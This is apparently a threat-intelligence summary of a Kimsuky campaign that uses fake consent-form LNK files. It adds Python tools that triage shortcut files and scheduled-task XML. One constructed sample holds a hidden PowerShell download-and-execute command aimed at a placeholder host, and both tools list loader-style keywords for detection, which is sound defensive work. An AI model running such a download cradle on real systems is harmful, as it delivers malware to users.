What is the true nature of the shortcut file I thought was a privacy consent form?

Malicious LNK files disguised as “Consent Forms for the Collection and Use of Personal Information” are being used to trick users into launching obfuscated PowerShell that downloads and runs additional payloads in memory. The campaign creates persistence through Windows Task Scheduler, drops decoy documents, and collects system details such as IP addresses and security product information, with behavior linked to the Kimsuky group. #LNK #PowerShell #WindowsTaskScheduler #Kimsuky

Keypoints

  • Attackers distribute malicious files disguised as ordinary work documents to lure users into opening them.
  • The files are actually LNK shortcut files that launch obfuscated PowerShell commands when executed.
  • Additional PowerShell scripts are downloaded from external sources and executed using a fileless, in-memory method.
  • The threat actor repeatedly modified external scripts, but all variants followed the same decrypt-and-execute pattern.
  • Persistence is established by registering a Windows Task Scheduler task to keep the loader running after reboot.
  • The malware drops a legitimate-looking decoy document and deletes the original LNK file to hide evidence.
  • Collected information includes security products, OS details, network settings, IP addresses, drive information, modified files, and running processes; the activity shows similarities to the Kimsuky group.
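The chain in the key points above (a document-named shortcut that launches PowerShell with a hidden window and pulls a second-stage script from the network) leaves its traces inside the shortcut file itself, so a defender can triage .lnk files before anyone double-clicks them. What follows is an added example, my own code rather than anything from the ASEC report or the campaign: a minimal MS-SHLLINK parser that pulls the target path, argument string and ShowCommand out of a .lnk and explains what looks wrong. The two LNK blobs are constructed inside the script, and the keyword list, the example.invalid URL and the 260-character threshold are assumptions, not the actor's real command line.

```python
"""Shell Link (.lnk) triage for the lure described above.

Added example (mine, not ASEC/AhnLab code, and not the campaign's real file):
the two LNK blobs are CONSTRUCTED below from the MS-SHLLINK layout, and the
keyword list is an assumed heuristic rather than the actor's exact command line.
"""
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional sections follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value: start minimised, never take focus

# StringData sections appear in this fixed order when their flag is set
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]

# Assumed indicators of a PowerShell loader in the argument string
SUSPICIOUS_ARGS = ("-enc", "-e ", "-w hidden", "windowstyle hidden", "-nop", "bypass",
                   "iex", "invoke-expression", "downloadstring", "frombase64string", "schtasks")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields; optional IDList/LinkInfo are skipped."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # uint16 IDListSize, then the items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:             # first uint32 of LinkInfo is its total size
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"show_command": show_cmd}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            fields[key] = ""
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        off += count * width
    return fields


def assess_lnk(fields: dict) -> list:
    """List why a parsed LNK resembles the lure (empty list = nothing suspicious)."""
    reasons = []
    launch = (fields["relative_path"] + " " + fields["arguments"]).lower()
    if "powershell" in launch or "pwsh" in launch:
        reasons.append("launches PowerShell")
        hits = [k for k in SUSPICIOUS_ARGS if k in fields["arguments"].lower()]
        if hits:
            reasons.append("suspicious arguments: " + ", ".join(hits))
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (console window kept out of sight)")
    if len(fields["arguments"]) > 260:
        reasons.append("oversized argument string, may carry an embedded script")
    return reasons


def build_lnk(relative_path: str, arguments: str = "", show_command: int = 1) -> bytes:
    """CONSTRUCTED input: minimal Unicode LNK with no IDList and no LinkInfo."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | (HAS_ARGUMENTS if arguments else 0)
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
              + struct.pack("<IIQQQIII", flags, 0x20, 0, 0, 0, 0, 0, show_command)
              + struct.pack("<HHII", 0, 0, 0, 0))   # HotKey and the three reserved fields
    body = struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    if arguments:
        body += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + body


# Constructed samples: a shortcut that runs a hidden download cradle (URL is a placeholder),
# and an ordinary shortcut to notepad.exe.
LURE_ARGS = ('-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command '
             '"IEX (New-Object Net.WebClient).DownloadString(\'http://stage.example.invalid/s.ps1\')"')
LURE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     LURE_ARGS, show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("consent_form.lnk (constructed)", LURE_LNK), ("notepad.lnk (constructed)", BENIGN_LNK)):
        print(label, assess_lnk(parse_lnk(blob)) or ["no findings"])
```

On a real host the same `parse_lnk` can be run over attachments or user Downloads directories; the three signals it reports (PowerShell as the target, loader-style switches, and a minimised window) are exactly the ones the decoy document is meant to distract from.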

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The attack relies on the victim opening a file disguised as a normal document (‘when the user executes the file’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Obfuscated PowerShell is used to execute malicious code (‘obfuscated PowerShell script’).
  • [T1105] Ingress Tool Transfer – The LNK-triggered script downloads additional malicious PowerShell from an external source (‘downloads additional malicious PowerShell scripts from an external source’).
  • [T1027] Obfuscated Files or Information – The scripts contain obfuscated and encrypted PowerShell code to hinder analysis (‘decrypts and executes encrypted, obfuscated PowerShell code’).
  • [T1053.005] Scheduled Task/Job: Scheduled Task – A Windows Task Scheduler task is registered to repeatedly run the loader and maintain persistence (‘registers a task in the Task Scheduler’).
  • [T1112] Modify Registry – Not mentioned in the article; no registry modification is described.
  • [T1074] Data Staged – The malware collects and prepares system information from the infected PC (‘collects information’).
  • [T1016] System Network Configuration Discovery – The information-theft script gathers network settings and IP addresses (‘network settings, IP address’).
  • [T1082] System Information Discovery – The script collects OS and drive information to assess the victim environment (‘operating system, drive information’).
  • [T1005] Data from Local System – The script gathers recently modified files and running processes from the local machine (‘recently modified files, running processes’).
  • [T1106] Native API – The backdoor loader decrypts embedded executable data and loads it into memory (‘decrypts the embedded executable data and loads it into memory’).
  • [T1218.011] System Binary Proxy Execution: Rundll32 – The article mentions DLL execution but does not name rundll32, so this technique is not confirmed.
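The T1053.005 entry is the step that survives a reboot, and on a Windows host every registered task is stored as an XML definition under %SystemRoot%\System32\Tasks, so those files are where the loader's re-launch shows up. Added example, my own code and not part of the ASEC report: it parses Task Scheduler XML with the standard library and reports the persistence signals relevant here (a script host as the action, a script under a user-writable path, logon or boot triggers, a short repetition interval, and the Hidden setting). Both task definitions are constructed for offline use, and the path fragments and keyword list are assumptions.

```python
"""Scheduled-task XML triage for the persistence step in the summary.

Added example (mine, not ASEC/AhnLab code). Real task definitions live under
%SystemRoot%\\System32\\Tasks; the two below are CONSTRUCTED, and the path
fragments and keyword list are assumed heuristics.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")
LOADER_ARGS = ("hidden", "-enc", "-nop", "bypass", "iex", "downloadstring", "frombase64string")
SHORT_REPEAT_SECONDS = 3600  # assumption: anything repeating hourly or faster is worth a look


def iso_duration_seconds(text: str) -> int:
    """Convert a Task Scheduler ISO 8601 duration (P1DT2H, PT10M, ...) to seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", text.strip())
    if not m:
        raise ValueError(f"unsupported duration: {text!r}")
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def triage_task(xml_text: str) -> dict:
    """Summarise one task definition and list the persistence signals it shows."""
    root = ET.fromstring(xml_text)  # constructed input; prefer defusedxml for files you do not trust
    findings, actions = [], []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip()
        args = (ex.findtext("t:Arguments", "", NS) or "").strip()
        actions.append((cmd, args))
        cmd_l, args_l = cmd.lower().strip('"'), args.lower()
        if cmd_l.endswith(SCRIPT_HOSTS):
            findings.append(f"action runs script host {cmd}")
        if any(p in cmd_l or p in args_l for p in USER_WRITABLE):
            findings.append("action references a user-writable path")
        hits = [k for k in LOADER_ARGS if k in args_l]
        if hits:
            findings.append("loader-style arguments: " + ", ".join(hits))
    trig_el = root.find("t:Triggers", NS)
    triggers = [t.tag.split("}")[-1] for t in trig_el] if trig_el is not None else []
    for trig in triggers:
        if trig in ("LogonTrigger", "BootTrigger"):
            findings.append(f"{trig}: re-runs at every logon/boot")
    for interval in root.iterfind(".//t:Repetition/t:Interval", NS):
        secs = iso_duration_seconds(interval.text or "")
        if 0 < secs <= SHORT_REPEAT_SECONDS:
            findings.append(f"repeats every {secs // 60} min")
    if (root.findtext("t:Settings/t:Hidden", "", NS) or "").strip().lower() == "true":
        findings.append("task is marked Hidden")
    return {"actions": actions, "triggers": triggers, "findings": findings}


# Constructed task definitions (the XML declaration is omitted so the text parses as a str).
SUSPECT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval></Repetition>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\update.ps1</Arguments>
    </Exec>
  </Actions>
</Task>
"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\Program Files\ExampleVendor\updater.exe"</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    for label, xml_text in (("suspect task", SUSPECT_TASK), ("benign task", BENIGN_TASK)):
        report = triage_task(xml_text)
        print(label, report["triggers"], report["findings"] or ["no findings"])
```

Pointing `triage_task` at every file under the Tasks directory (they are UTF-16 with a declaration, so open them in text mode with `encoding="utf-16"` and strip the declaration, or feed bytes to `ET.parse`) gives a quick host-wide sweep; a task that combines a script host, a path inside a user profile and a logon trigger is the pattern the summary attributes to this loader.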

Indicators of Compromise

  • [File names] disguised lure files and decoy content – “Consent Forms for the Collection and Use of Personal Information” and a legitimate-looking decoy document
  • [File extensions / file types] malicious shortcut files and PowerShell scripts – .LNK files, additional PowerShell scripts
  • [Execution artifacts] persistence and created items – Windows Task Scheduler entries, additional scripts created in user account paths
  • [External sources / web service references] payload delivery locations – an external source, a legitimate web service used to store encoded data
  • [Behavioral IOC] fileless execution and in-memory loading – PowerShell code executed in memory without saving to disk

Read more: https://asec.ahnlab.com/en/94164/